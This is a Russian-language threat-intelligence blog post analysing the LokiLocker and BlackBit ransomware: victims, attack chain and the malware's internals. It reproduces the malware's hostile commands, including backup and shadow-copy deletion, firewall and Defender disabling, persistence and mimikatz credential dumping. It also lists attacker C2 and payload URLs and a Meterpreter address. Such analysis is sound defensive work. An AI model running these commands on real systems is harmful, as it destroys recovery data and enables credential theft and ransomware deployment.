Несвятое семейство: как вымогатели LokiLocker и BlackBit атакуют российский бизнес | Блог F.A.C.C.T.

За прошедший год количество атак на российские компании с использованием программ-вымогателей выросло не менее чем на треть по сравнению с позапрошлым годом. К наиболее активным  в России шифровальщикам Phobos, Dharma, CryLock и другим прибавились программы-вымогатели на основе Babuk, Conti и LockBit. Эти шифровальщики преимущественно использовались для атак на западные компании, однако публикация в открытом доступе исходных кодов Babuk и Conti, а также билдера LockBit 3 Black привела к обратному эффекту. В период геополитической напряженности эти программы-вымогатели стали «оружием» в руках как хактивистов, так и киберпреступников. Параллельно ранее известные семейства программ-вымогателей, которые были достаточно редкими в России, стали все чаще использоваться для атак на российские организации. Одним из таких семейств является LokiLocker. Именно ему мы решили посвятить этот блог, а особый акцент сделаем на его подсемействе — BlackBit, которое активно используется в атаках на российский и белорусский бизнес.

Профайл вымогателей, работающих с шифровальщиками LokiLocker/BlackBit

Специализация Вымогательство выкупа у жертв за расшифровку данных
Жертвы Компании малого и среднего бизнеса по всему миру. 44% от общего числа атак, по нашим оценкам, приходится на Россию и Белоруссию.
Сумма выкупа $10000 – $100000

Сумма выкупа зависит от количества приобретаемых жертвой декрипторов (один декриптор расшифровывает данные на одном хосте)

Период активности С лета 2021 года по настоящее время
Начальный вектор атаки Скомпрометированные службы удаленного доступа
Программа-вымогатель Программа-вымогатель представляет собой обфусцированную .NET сборку. Программа-вымогатель имеет широкие функциональные возможности
Особенности Программа-вымогатель не шифрует файлы на компьютерах с установленным персидским языком

Осуществляется шифрование только Windows-систем и, чаще всего,  в выходные дни.

Программы-вымогатели предоставляются партнерам в рамках партнерской программы (RaaS, Ransomware-as-a-Service).

Атакующие не похищают данные жертвы, соответственно не имеют сайт утечек (DLS).

В качестве канала взаимодействия жертвы с атакующими используется электронная почта и Telegram.

По истечении 30-дневного срока выплаты выкупа программа-вымогатель уничтожает все данные в скомпрометированной системе

«Принц Персии»: несколько слов о семействе LokiLocker

Первые программы-вымогатели LokiLocker появились летом 2021 года, нашим криминалистам довелось впервые столкнуться с программой-вымогателем семейства LokiLocker, а точнее, с результатами ее использования в марте 2022 года. От атаки пострадала компания в одной из стран Ближнего Востока. В следующем инциденте жертва оказалась также связана с Ближним Востоком. В дальнейшем география жертв стала расширяться, атаки с использованием LokiLocker стали фиксироваться по всему миру.  Среди пострадавших оказались, в том числе и российские компании.

В сентябре 2022 года появилось подсемейство BlackBit, которое стало активно использоваться для атак на средний и малый бизнес в России. Программы BlackBit по функциональным характеристикам практически идентичны LokiLocker, отличие лишь в нейминге: для зашифрованных файлов стало использоваться расширение «.BlackBit» (реже используются и другие расширения) и в записках с требованием выкупа стало указываться «Black Bit» вместо «Loki Locker«. Но, по сути, это идентичные программы-вымогатели.

При «первом знакомстве» программа-вымогатель LokiLocker показалась экспертам довольно странной и не похожей на другие. Например, при запуске программа проверяет установленные языки ввода. Если среди них установлен персидский язык (Persian), программа завершает свою работу. Также необычным является способ конфигурирования программы-вымогателя с помощью параметров, перечисленных в текстовом файле, а не с помощью, например, аргументов командной строки. Кроме того, программа-вымогатель имеет функционал по уничтожению данных на скомпрометированной системе по истечении срока выплаты выкупа, который обычно составляет 30 суток с момента первого запуска вымогателя.

В марте 2022 года ресерчеры компании BlackBerry опубликовали результаты исследования нового семейства программ-вымогателей LokiLocker, атакующих Windows-системы. В начале своего блога ресерчеры предположили, что проверка языка ввода в программе-вымогателе сделана специально авторами для проведения атак «под чужим флагом», чтобы обвинения падали якобы на злоумышленников, имеющих иранское происхождение. Однако в заключении авторы блога уже поставили под сомнение свои же первоначальные предположения.

Программы-вымогатели LokiLocker предоставляются для использования по партнерской программе (RaaS, Ransomware-as-a-Service), которая носит достаточно закрытый характер. Вначале в андеграунде фигурировали редкие сообщения по набору в LokiLocker RaaS, но общение велось не публично. Действительно, в первых атаках в записках с требованием выкупа указывались никнеймы, которые можно было найти в профильных группах Telegram на персидском языке, а также применялись утилиты, например, брутеры паролей, использующие в своем интерфейсе персидский язык.

Сейчас ясности в вопросе национальной принадлежности злоумышленников, использующих LokiLocker / BlackBit в своих атаках, у экспертов стало еще меньше. Глобализация коснулась и киберпреступности, и она давно уже стала международной. К слову сказать, в первой атаке, которую мы упоминали выше, использовалась программа LokiLocker с идентификатором атакующих – «Sklad«.

Для проведения атак владельцы RaaS компилируют партнерам программу-вымогатель, в которой указываются идентификатор атакующих и один или два адреса электронной почты для взаимодействия с жертвой. Коммуникация жертвы со злоумышленниками после шифрования данных осуществляется по электронной почте, в некоторых образцах BlackBit в записке с требованием выкупа может дополнительно указываться чат в Telegram. Имя собранной для партнеров программы соответствует первому адресу электронной почты, например: RickyMonkey@onionmail.org.exe

Некоторые образцы программ-вымогателей используются злоумышленниками в атаках  в различных регионах. Так, например, программа-вымогатель, замеченная в атаке на одну из российских компаний, применялась тремя месяцами ранее в атаке в другой стране.

Для партнеров BlackBit создан портал «Black Bit Premium» (рис. 1), этот ресурс также используется программами-вымогателями BlackBit для загрузки на скомпрометированную систему публичного ключа RSA (криптографический алгоритм с открытым ключом).

Окно входа на портал Black Bit Premium

Рис. 1. Окно входа на портал Black Bit Premium

Стоит отметить, что во всех выявленных образцах BlackBit используется один и тот же набор мастер-ключей RSA. Напротив, в образцах LokiLocker, которые мы выявили за прошедший год, содержится 6 различных наборов мастер-ключей RSA.

До конца не очевиден смысл создания подсемейства BlackBit. Некоторые партнеры с одинаковыми идентификаторами и адресами электронной почты встречаются в образцах программ-вымогателей BlackBit и LokiLocker одного периода времени, например:

BlackBit LokiLocker
decrliv

decrliv@aol.com

decliv@aol.com

decrliv

decrliv@aol.com

decliv@aol.com

Lastsmile

Filesupport@airmail.cc

unlockerhelp@onionmail.org

last

Filesupport@airmail.cc

unlockerhelp@onionmail.org

Возможно, BlackBit – премиальная партнерская программа, и появление BlackBit связано с перераспределением внутри RaaS или другими внутренними процессами.

Внимание на Россию: жертвы LokiLocker / BlackBit в мире

Поскольку партнеры, использующие LokiLocker / BlackBit, не были замечены за хищением данных у жертв, у них нет сайта для публикации украденных данных  (DLS, Data Leak Site). В связи с этим представляется затруднительным оценить в полной мере масштабы и географию всех их атак. Тем не менее криминалисты F.A.C.C.T. смогли собрать информацию о жертвах  LokiLocker / BlackBit, основываясь как на данные, полученные в результате реагирований на инциденты, так и данных из портала VirusTotal. Представленная ниже статистика охватывает период с апреля 2022 года по настоящее время.

Россия 11 (BlackBit)
10 (LokiLocker)
Барнаул 1 (BlackBit)
1 (LokiLocker)
Иркутск 1 (BlackBit)
Истра 1 (BlackBit)
Казань 1 (BlackBit)
Краснодар 1 (BlackBit)
Красноярск 1 (BlackBit)
Ленинск-Кузнецкий 1 (LokiLocker)
Липецк 1 (BlackBit)
Москва 3 (BlackBit)
4 (LokiLocker)
Новосибирск 1 (LokiLocker)
Санкт-Петербург 1 (BlackBit)
2 (LokiLocker)
Ульяновск 1 (LokiLocker)
Челябинск 1 (LokiLocker)
Белоруссия 3 (BlackBit)
3 (LokiLocker)
Барановичи 1 (LokiLocker)
Гомель 1 (BlackBit)
Минск 2 (LokiLocker)
Могилев 2 (BlackBit)
Европа 11 (BlackBit)
2 (LokiLocker)
Великобритания 2 (BlackBit)
Венгрия, Вац 1 (BlackBit)
Германия 1 (BlackBit)
1 (LokiLocker)
Испания, Вильянуэва-де-ла-Каньяда 1 (BlackBit)
Италия, Лумедзане 1 (BlackBit)
Нидерланды 1 (BlackBit)
Украина, Белая Церковь 1 (BlackBit)
Украина, Киев 1 (BlackBit)
Украина, Одесса 1 (BlackBit)
Франция 1 (BlackBit)
Чехия, Прага 1 (LokiLocker)
Азия 3 (BlackBit)
6 (LokiLocker)
Вьетнам, Ханой 1 (LokiLocker)
Гонконг 1 (BlackBit)
Индия, Гувахати 1 (BlackBit)
Индия, Джайпур 1 (LokiLocker)
Индия, Мумбаи 1 (LokiLocker)
Индия, Сурат 1 (LokiLocker)
Индия, Ченнаи 1 (BlackBit)
Иран, Тебриз 1 (LokiLocker)
Китай, Пекин 1 (LokiLocker)
Африка 1 (LokiLocker)
ЮАР, Кейптаун 1 (LokiLocker)
Южная Америка 1 (BlackBit)
6 (LokiLocker)
Боливия, Ла-Пас 1 (BlackBit)
1 (LokiLocker)
Бразилия, Маринга 1 (LokiLocker)
Бразилия, Сан-Паулу 1 (LokiLocker)
Бразилия, Сантана-ди-Парнаиба 1 (LokiLocker)
Колумбия, Перейра 1 (LokiLocker)
Перу, Лима 1 (LokiLocker)
Северная Америка 3 (BlackBit)
1 (LokiLocker)
Канада, Ватерлоо 1 (BlackBit)
Мексика, Мехико 1 (BlackBit)
США, Нью-Йорк 1 (BlackBit)
США 1 (LokiLocker)

Как мы видим из таблицы выше, партнеры LokiLocker / BlackBit работают практически по всему миру, но при этом довольно пристальное внимание уделяют России и Белоруссии — на эти страны приходится порядка 44% от общего числа атак с использованием LokiLocker / BlackBit.

KillChain LokiLocker / BlackBit: описание типовой атаки

Получение первоначального доступа

В качестве начального вектора атак злоумышленниками используют преимущественно скомпрометированные службы удаленного доступа (T1133) и, прежде всего, это RDP (Remote Desktop Protocol). Доступ через публично доступный терминальный сервер является одной из самых популярных техник получения первоначального доступа к ИТ-инфраструктуре жертвы у киберпреступников, промышляющих вымогательством за восстановление зашифрованных данных.

Для получения доступа к терминальному серверу атакующие могут использовать подбор имени пользователя и пароля (T1110). Также корректные учетные данные (T1078) могут быть приобретены злоумышленниками у других злоумышленников, например, в андеграунде у брокеров начального доступа.

Подготовка к развитию атаки

Получив первоначальный доступ, атакующие копируют на скомпрометированный хост набор инструментов или его часть (T1105), а также стремятся закрепиться и получить доступ к привилегированным учетным данным, чтобы получить возможность продвигаться по сети.

Для получения привилегированных учетных данных атакующие используют популярную легитимную утилиту mimikatz (T1003). Также программа-вымогатель LokiLocker / BlackBit имеет в конфигурации параметр «mimikatz«, в соответствии с которым программа загружает на хост из сети интернет утилиту mimikatz и запускает ее со следующими аргументами командной строки:

"privilege::debug" "log {LOG_NAME}.txt" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam" exit

LOG_NAME – случайное имя файла отчета.

Для получения списка пользователей в Active Directory (T1087) некоторые партнеры пользовались .NET утилитой LoginParser (LoginParser.exe).

Для подбора паролей к учетным данным (T1110) атакующие используют различные сборки .NET утилиты AccountRestore (AccountRestore.exe, AccountRestore 2.exe)

Некоторые партнеры использовали утилиты NirSoft для извлечения паролей  (https://www.nirsoft.net/password_recovery_tools.html):

  • CredentialsFileView  (CredentialsFileView.exe) (T1555.004);
  • OperaPassView (OperaPassView.exe), WebBrowserPassView (WebBrowserPassView.exe) (T1555.003);
  • RouterPassView (RouterPassView.exe) (T1552.001);
  • VNCPassView (VNCPassView.exe) (T1552.002);
  • PstPassword (PstPassword.exe) (T1552.001).

Сбор информации об ИТ-инфраструктуре

Для разведки сети атакующие используют следующие сетевые сканеры:

  • Advanced Port Scanner (https://www.advanced-port-scanner.com/) (Advanced_Port_Scanner_2.5.3869.exе);
  • SoftPerfect Network Scanner (https://www.softperfect.com/products/networkscanner/) (nasp.exe);

Атакующие используют различные версии консольной утилиты NS (NS.exe, 5-NS.exe) (рис. 2) для сканирования общих ресурсов сети (Shares) (T1135) и подключения их как сетевых дисков, а также монтирования скрытых томов. Ранее такие утилиты встречались в атаках с использованием программы-вымогателя Dharma.

Консольная утилита NS

Рис. 2. Консольная утилита NS

Для поиска файлов и папок атакующие использовали утилиту Everything (ET.exe). Это производилось, прежде всего, для поиска аутентификационных данных, сохраненных в текстовых файлах (T1552).

Также злоумышленники просматривали файлы-документы на хостах, но не похищали их. Предположительно, это делалось для оценки платежеспособности жертвы и определения суммы выкупа.

Продвижение по сети

Для продвижения по сети партнеры используют RDP (T1021.001) и учетные данные, которые были похищены или получены в результате успешного перебора паролей (brute force) (T1110).

Подготовка к развертыванию программы-вымогателя

Атакующие предварительно отключают антивирусное программное обеспечение до развертывания программы-вымогателя (T1562.001). Некоторые образцы программ-вымогателей LokiLocker / BlackBit неоднократно используются в атаках, эти образцы после первых атак могут быть загружены на портал VirusTotal, онлайн-песочницы и т.п., тем самым, информация о данных программах зачастую уже имеется в Windows Defender и антивирусных продуктах. Также «поведение» в системе программ-вымогателей LokiLocker / BlackBit давно известно многим антивирусным программам и EDR. Все это вынуждает злоумышленников предварительно нейтрализовывать установленные в скомпрометированной системе средства безопасности.

Для нейтрализации средств безопасности атакующие могут использовать следующие легитимные утилиты:

  • Process Hacker (PH.exe);
  • KAV Removal Tool (KAVREMVR.exe);
  • ESET AV Remover (avremover_nt32_enu.exe, avremover_nt64_enu.exe);
  • IObit Unlocker (unlocker-setup.exe);
  • Revo Uninstaller (RevoUninProSetup.exe).

Развертывание программы-вымогателя

Распространение программы-вымогателя по ИТ-инфраструктуре жертвы производилось атакующими преимущественно вручную (T1570).

При расследовании атаки на одну из российских компаний был выявлен запуск злоумышленниками старого файлового вируса Neshta. Впоследствии были выявлены еще несколько образцов программ-вымогателей LokiLocker / BlackBit из атак в других странах, также инфицированных вирусом Neshta. Возможно, атакующие использовали инфицированный инструмент, либо вирус использовался в качестве оригинального способа противодействия средствам безопасности.

В большинстве случаев шифрование данных жертвы производилось в выходные дни. Продолжительность атак с использованием программ-вымогателей LokiLocker / BlackBit  составляет, по нашим оценкам, от суток до нескольких дней.

Для расшифровки данных для каждого хоста требуется свой декриптор, злоумышленники берут оплату за расшифровку в зависимости от количества хостов, которые требуется расшифровать.

Анализ программы-вымогателя BlackBit

Программа-вымогатель LokiLocker / BlackBit представляет собой сборку .NET (v4.0.30319), разработанную на языке программирования C#. Исполняемый файл программы-вымогателя имеет формат PE32, крайне редко – PE32+.

Все образцы LokiLocker / BlackBit обфусцированы. Ранее для обфускации LokiLocker использовался протектор NETGuard с использованием плагина виртуализации KoiVM v0.2.0-custom. Для всех образцов BlackBit используется один и тот .NET обфускатор. Этот же обфускатор также используется для половины образцов LokiLocker и вспомогательных утилит. Примечательно, что после обфускации данный протектор устанавливает в защищенных образцах значение временной метки PE (PE timestamp), равное 5000A574h, что соответствует 2012-07-13 22:47:16 (UTC), и значение контрольной суммы, равное 0x00023BFB.

Ранее уже было сказано, что при запуске программа-вымогатель проверяет на скомпрометированной системе установленные языки ввода. Если установлен персидский язык (Persian), программа завершает свою работу. Также в коде программы содержится строка «Iran«.

При запуске LokiLocker возможно указать аргумент командной строки «log«, чтобы программа создавала текстовый файл отчета «logs.txt» в текущем каталоге. Однако в BlackBit такая возможность отсутствует.

Программа осуществляет попытку открытия в текущем каталоге текстового файла конфигурации «loki.txt» (описание параметров конфигурации приведено ниже). В некоторых последних образцах BlackBit для файла конфигурации используется имя «b.txt«. Если данный файл существует, он копируется в каталог «%AllUsersProfile%«:

%AllUsersProfile%\config.BlackBit

Если в конфигурационном файле «%AllUsersProfile%\config.BlackBit» не указан параметр отключения автозапуска «nostartup«, программа осуществляет следующие действия:

  • создает копии своего исполняемого файла в каталоге Startup текущего пользователя под именем «winlogon.exe» и под случайным именем;
  • копирует свой исполняемый файл в каталог «%AppData%«:
    %AppData%\winlogon.exe
  • создает задачу планировщика:
    schtasks /CREATE /SC ONLOGON /TN BlackBit /TR %AppData%\winlogon.exe /RU SYSTEM /RL HIGHEST /F
  • копирует свой исполняемый файл в каталог %AllUsersProfile%:
    %AllUsersProfile%\winlogon.exe
  • создает следующий параметр в системном реестре:
    [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Invoke]
    «Michael Gillespie»=»%AllUsersProfile%\winlogon.exe»
  • копирует свой исполняемый файл в каталог CommonStartup под именем «winlogon.exe«;
  • копирует свой исполняемый файл в каталог «%Windows%«:
    %Windows%\winlogon.exe
  • создает параметр в системном реестре:
    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Invoke]
    «Michael Gillespie»=»%Windows%\winlogon.exe»
  • извлекает в каталог Startup текущего пользователя пакетный файл «wvtymcow.bat» со следующим содержимым:
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Далее программа извлекает файл с иконкой, которую ассоциирует в системе с расширением зашифрованных файлов «.BlackBit«. Также программа извлекает HTA-файл «%AllUsersProfile%\info.BlackBit» с требованием выкупа за расшифровку и таймером отсчета времени выплаты, компилирует с помощью Csharp содержащийся в теле программы исходный код на C# в EXE-файл со случайным именем в каталог «%AllUsersProfile%«. Данный EXE-файл при запуске выводит сообщение о шифровании файлов (рис. 3) и открывает с помощью mshta.exe HTA-файл «%AllUsersProfile%\info.BlackBit«. Программа-вымогатель регистрирует указанный EXE-файл в реестре, как обработчик открытия файлов с расширением «.BlackBit«:

[HKCR\BlackBit\shell\open\command] ""= "%AllUsersProfile%\{RND}.exe "%l""

RND – случайное имя.

Сообщение о шифровании, открываемое при открытии файлов ".BlackBit"

Рис. 3. Сообщение о шифровании, открываемое при открытии файлов «.BlackBit» (пример)

Программа-вымогатель проверяет наличие администраторских прав пользователя, при отсутствии пытается запустить свой исполняемый файл из-под администраторской учетной записи (runas). В случае неудачи, программа завершает свою работу.

Программа завершает следующие процессы:

wxserver wxserverview sqlservr ragui
supervise culture rtvscan defwatch
winword qbw32 qbdbmgr qbupdate
qbcfmonitorservice axlbridge qbidpservice httpd
fdlauncher msdtsrvr tomcat6 zhudongfangyu
vmware-usbarbitator64 vmware-converter dbsrv12 msftesql
sqlagent sqlbrowser sqlwriter oracle
ocssd dbsnmp synctime agntsvc
mydesktopqos isqlplussvc xfssvccon mydesktopservice
ocautoupds agntsvc agntsvc agntsvc
encsvc firefoxconfig tbirdconfig ocomm
mysqld mysqld-nt mysqld-opt dbeng50
sqbcoreservice excel infopath msaccess
mspub onenote outlook powerpnt
steam thebat thebat64 thunderbird
visio winword wordpad

Программа останавливает следующие системные службы:

defwatch ccevtmgr ccsetmgr savroam
sqlserv sqlagent sqladhlp culserver
rtvscan sqlbrowser sqladhlp qbidpservice
quickboooks.fcs qbcfmonitorservice sqlwriter msmdsrv
tomcat6 zhundongfangyu vmware-usbarbitator64 vmware-converter
dbsrv12 dbeng8 wrapper mssqlserver
mssql$contoso1 msdtc sqlserveragent vds

Для удаления теневых копий разделов, удаления резервных копий состояния системы, отключения восстановления в загрузочном меню Windows, а также для отключения брандмауэра Windows выполняет следующие команды:

vssadmin delete shadows /all /quiet
wbadmin DELETE SYSTEMSTATEBACKUP
wmic shadowcopy delete
wbadmin delete catalog -quiet
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
netsh advfirewall set currentprofile state off
netsh firewall set opmode mode=disable

Также программа-вымогатель удаляет точки восстановления системы, очищает корзину и отключает Windows Defender с помощью изменения значений параметров реестра Windows:

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableBehaviorMonitoring"=REG:DWORD:1
"DisableOnAccessProtection"= REG:DWORD:1
"DisableScanOnRealtimeEnable"= REG:DWORD:1
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"= REG:DWORD:1

Далее программа-вымогатель с помощью функций WinInet API направляет HTTP-запрос POST на ресурс злоумышленников «http://application-api.xyz/api/index.php» (User-Agent: «BlackBit/1.0«)  со следующими данными:

unique-id={ID}&disk-size={DISK_SIZE}&user={USER}&cpu-name={CPU_NAME}&ram-size={RAM_SIZE}&os-name={OS_NAME}
  • ID – идентификатор жертвы, соответствующий серийному номеру системного тома (8 шестнадцатеричных символов), либо серийному номеру жесткого диска #0;
  • DISK_SIZE – размер диска;
  • USER – идентификатор атакующих (имя пользователя партнерского портала);
  • CPU_NAME – название процессора;
  • RAM_SIZE – размер оперативной памяти;
  • OS_NAME – название и версия операционной системы.

В ответ программа получает данные в формате JSON, в которых содержится публичный ключ RSA, предназначенный для шифрования данных.

Если публичный ключ не удается загрузить с интернет-ресурса атакующих, программа создает пару ключей RSA-2048 с помощью класса .Net RSACryptoServiceProvider. Сгенерированный приватный ключ в формате XML, а также информация о системе шифруются с помощью содержащихся в теле программы публичных ключей RSA. В программе содержится 5 публичных ключей RSA: 4 публичных ключа RSA-4096 и 1 публичный ключ RSA-3072. Публичные ключи RSA-4096 используются для шифрования по частям приватного ключа в формате XML, а ключ RSA-3072 используется для шифрования информации о системе.

Информация о системе содержит следующие данные (рис. 4): идентификатор жертвы; размер диска; название процессора; размер оперативной памяти; временная зона; формат региона; внешний IP-адрес, полученный с помощью HTTP-запроса по ссылке «http://ip-api.com/json«; адреса электронной почты и идентификатор атакующих; логический результат проверки работоспособности функций Cryptography API: Next Generation (CNG) (0 или 1).

Информация о системе BlackBit

Рис. 4. Так выглядит содержимое информации о скомпрометированной системе до шифрования

Общий размер указанных зашифрованных данных составляет 2 432 байта. Эти зашифрованные данные в кодировке Base64 сохраняются в файл «%AllUsersProfile%\Cpriv.BlackBit«. Также зашифрованные данные записываются в параметр системного реестра:

[HKCU\SOFTWARE\BlackBit]
"full"= REG_BINARY:{ENC_PRIVKEY_DATA}

ENC_PRIVKEY_DATA – зашифрованные приватный ключ RSA-2048 и информация о системе.

Полученный или сгенерированный публичный ключ RSA, а также время окончания срока выплаты выкупа сохраняются в раздел реестра (рис. 5):

[HKCU\SOFTWARE\BlackBit]
"public"= REG_BINARY:{ENC_PUBKEY_DATA}
"timer"= REG_BINARY:{ENC_TIMER_DATA}
  • ENC_PUBKEY_DATA – зашифрованный с помощью побайтовой операции XOR со значением 11h публичный ключ RSA-2048 в формате XML.
  • ENC_TIMER_DATA – зашифрованная с помощью побайтовой операции XOR со значением 54h строка со временем окончания срока выплаты выкупа за расшифровку данных. Обычно время окончания срока выплаты соответствует времени спустя 30 суток после первого запуска программы-вымогателя на компьютере.
Раздел реестра BlackBit

Рис. 5. Раздел реестра BlackBit

Если параметр системного реестра «public» существует, получение или генерация ключей RSA-2048 не осуществляется, программой используется ключ, извлеченный из указанного параметра реестра.

В последних выявленных образцах LokiLocker функциональность по загрузке публичного ключа RSA с ресурса злоумышленников не используется, пара ключей RSA генерируются непосредственно на компьютере.

Шифрование файлов

Программа-вымогатель осуществляет многопоточное шифрование файлов на всех дисках и на доступных сетевых ресурсах. Перед шифрованием LokiLocker монтирует скрытые тома, однако BlackBit этого не осуществляет.

Программа-вымогатель не шифрует файлы в каталогах с установленным атрибутом «системный», а также в следующих каталогах:

%Windows%
%SystemDrive%\EFI
%SystemDrive%\$Recycle.Bin

Программа-вымогатель не шифрует свои файлы: файлы с расширениями «.BlackBit» и с именами «Restore-My-Files.txt«, «info.hta«.

По умолчанию, если не установлен параметр «full«, не шифруются файлы со следующими расширениями:

«.exe«, «.dll«, «.msi«, «.com»

В некоторых образцах BlackBit параметр «full» не используется, в этом случае осуществляется шифрование всех файлов.

Файлы размером до 1 572 864 байт шифруются полностью. В файлах большего размера шифруются 3 блока по 256 килобайт: в начале, конце и середине файла. Шифрование содержимого файлов производится с помощью алгоритма шифрования AES-256 GCM (Galois/Counter Mode), реализованного с помощью функций CNG API. Генерация 32-байтного ключа и 12-байтного nonce осуществляется с помощью функции CNG API BCryptGenRandom. Ключ и nonce шифруются с помощью сгенерированного или загруженного публичного ключа RSA-2048 и дописываются в конец зашифрованного файла (256 байт).

Зашифрованные файлы именуются следующим образом:

[{EMAIL1}][{ID}]{FILENAME}.BlackBit
  • EMAIL1 – первый адрес электронной почты атакующих.
  • ID – идентификатор жертвы, соответствующий серийному номеру системного тома (8 шестнадцатеричных символов), либо серийному номеру жесткого диска #0.
  • FILENAME – оригинальное имя файла.

Реже в некоторых образцах для зашифрованных файлов используются  другие расширения, например, «.KTBR» и «.onion700«.

В каждом обработанном каталоге вымогатель создает текстовые файлы Restore-My-Files.txt с требованием выкупа (рис. 6).

Пример содержимого файла Restore-My-Files.txt

Рис. 6. Пример содержимого файла Restore-My-Files.txt

Если ключи были сгенерированы на компьютере, на каждом диске создаются файлы Cpriv.BlackBit, и в этом случае в текстовые файлы Restore-My-Files.txt добавляется следующая строка:

!!!Deleting «Cpriv.BlackBit» causes permanent data loss.

Для зашифрованных томов вымогатель устанавливает метку «Locked by BlackBit«.

На каждом диске программа-вымогатель создает файлы info.hta (рис. 7).

Вид требования выкупа при открытии info.hta

Рис. 7. Вид требования выкупа при открытии info.hta

Программа изменяет обои рабочего стола (рис. 8).

Вид рабочего стола после шифрования BlackBit

Рис. 8. Вид рабочего стола после шифрования

Также программа помещает текст с информацией о шифровании файлов на экран входа пользователя в систему (рис. 9):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"legalnoticecaption"="Encrypted by BlackBit"
"legalnoticetext"="All your important files have been encrypted.
If you want to restore them, write us to the e-mail: {EMAIL1}
Write this ID in the title of your message: {ID}
In case of no answer in 24 hours write us to this e-mail: {EMAIL2}"
Пример текста с информацией о шифровании файлов Black Bit

Рис. 9. Пример текста с информацией о шифровании файлов, которую видит пользователь на экране

Также программа изменяет информацию Original Equipment Manufacturer (OEM) в системном реестре:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation]
"Manufacturer"="Encrypted by BlackBit"
"SupportPhone"="All your important files have been encrypted.
If you want to restore them, write us to the e-mail: {EMAIL1}
Write this ID in the title of your message: {ID}
In case of no answer in 24 hours write us to this e-mail: {EMAIL2}"
  • EMAIL1 – первый адрес электронной почты атакующих.
  • ID – идентификатор жертвы, соответствующий серийному номеру системного тома (8 шестнадцатеричных символов), либо серийному номеру жесткого диска #0.
  • EMAIL2 – второй адрес электронной почты атакующих.

После завершения шифрования файлов для затруднения их восстановления LokiLocker запускает дефрагментацию всех томов с помощью команды:

defrag /C /H

В программах-вымогателях BlackBit запуск дефрагментации не осуществляется.

Уничтожение данных

Ранее мы уже говорили, что в значении параметра «timer» раздела реестра «HKCU\SOFTWARE\BlackBit» содержится зашифрованная строка (XOR 54h) со временем окончания срока выплаты выкупа, которое соответствует времени  спустя 30 суток после первого запуска программы-вымогателя на компьютере.

Программа-вымогатель проверяет текущее время, если оно превышает указанное в параметре реестра «timer», программа удаляет все файлы и перезаписывает MBR жесткого диска #0 (PhysicalDrive0). При загрузке с указанного жёсткого диска после перезаписи MBR в этом случае будет отображаться текст (рис. 10).

Если в файле конфигурации указан параметр «nofuck«, то программа в этом случае лишь не блокирует запуск Task Manager путем изменения значения параметра «DisableTaskMgr» в системном реестре. Если программа запущена и текущее время превышает время ультиматума, то также будет произведено уничтожение данных.

Загрузка системы после перезаписи MBR

Рис. 10. Загрузка системы после перезаписи MBR

Дополнительные функции

В некоторых образцах LokiLocker содержится полезная нагрузка Loki.Payload.dll в виде сборки .NET (v4.0.30319).

Данная полезная нагрузка при отсутствии файла «C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe«, загружает его по ссылке «http://imagesource.zapto.org/bin/vbc.exe«.

Также полезная нагрузка пытается загрузить данные по ссылке «http://imagesource.zapto.org/bin/win7.jpg«, из которых распаковывает и расшифровывает программный модуль. Если загрузить не удается, используется программный модуль, содержащийся в ресурсах полезной нагрузки.

Программный модуль внедряется в запущенный полезной нагрузкой процесс «C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe«.

В ресурсах полезной нагрузки находится программный модуль формата PE32 (EXE), содержащий код Meterpreter Shellcode Loader, который загружает Shellcode по адресу 157.90.17.53:7300 и передает ему управление.

Конфигурация программы-вымогателя

При запуске программа проверяет наличие файла конфигурации «loki.txt» в текущем каталоге, если файл существует, он копируется под именем %AllUsersProfile%\config.BlackBit. В некоторых последних образцах BlackBit для файла конфигурации используется имя «b.txt«.

Файл конфигурации представляет собой текстовый файл (рис. 11), в каждой строке которого могут содержаться параметры. Проверка строки с параметром осуществляется с учетом регистра.

Пример содержимого файла конфигурации LokiLocker / BlackBit

Рис. 11. Пример содержимого файла конфигурации LokiLocker / BlackBit

Странно, что партнеры, которые используют в атаках BlackBit, не совсем осведомлены о параметрах конфигурации BlackBit. Вполне возможно, что параметры используются по привычке, полученной от использования LokiLocker. Представленный на рис. 11 пример взят из реальной атаки, при этом используемый в атаке образец BlackBit, игнорировал параметры «full» и «psexec» (см. ниже в таблице). В другой же атаке нам достался файл конфигурации, где были указаны параметры с первой заглавной буквой: «Clast«, «Nofuck«, «Psexec«.

Параметр Описание
nostartup Не осуществлять автозапуск своего исполняемого файла
update Отобразить поддельное окно обновления Windows.

Для этого программа извлекает в каталог %Temp% HTA-файл под случайным именем и открывает его

noprint Отключает выполнение следующих действий программы-вымогателя:

1) Отключение настроек Windows Defender путем модификации следующих параметров реестра:

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]

«DisableAntiSpyware»=REG_DWORD:1

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]

«DisableRealtimeMonitoring»=REG_DWORD:1

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet]

«SubmitSamplesConsent»=REG_DWORD:1

2) Обновление групповых политик на компьютерах Active Directory с помощью команды:

powershell.exe -Command «Get-ADComputer -filter * -Searchbase ‘%s’ | foreach{ Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}

3) Выключение монитора.

В программах-вымогателях BlackBit действия 2 и 3 не осуществляются.

justns Шифровать файлы только на сетевых ресурсах
mimikatz Программа загружает утилиту mimikatz в зависимости от разрядности по ссылкам:

http://tb28.trainbit.com:8080/files/9727827484/v34832447675444A4C2B7263452F63516A6365445933624754316D58615165737857445172485352462F454D31386C4A5936532F6F31413D3D/x64.zip

http://tb28.trainbit.com:8080/files/3727827484/v34832447675444A4C2B726538367672712B6973524D624149516541553132654362567742524D457354734165755678746134424777773D3D/Win32.zip

Загруженная утилита запускается программой-вымогателем со следующими аргументами:

«privilege::debug» «log {LOG_NAME}.txt» «sekurlsa::logonPasswords» «token::elevate» «lsadump::sam» exit

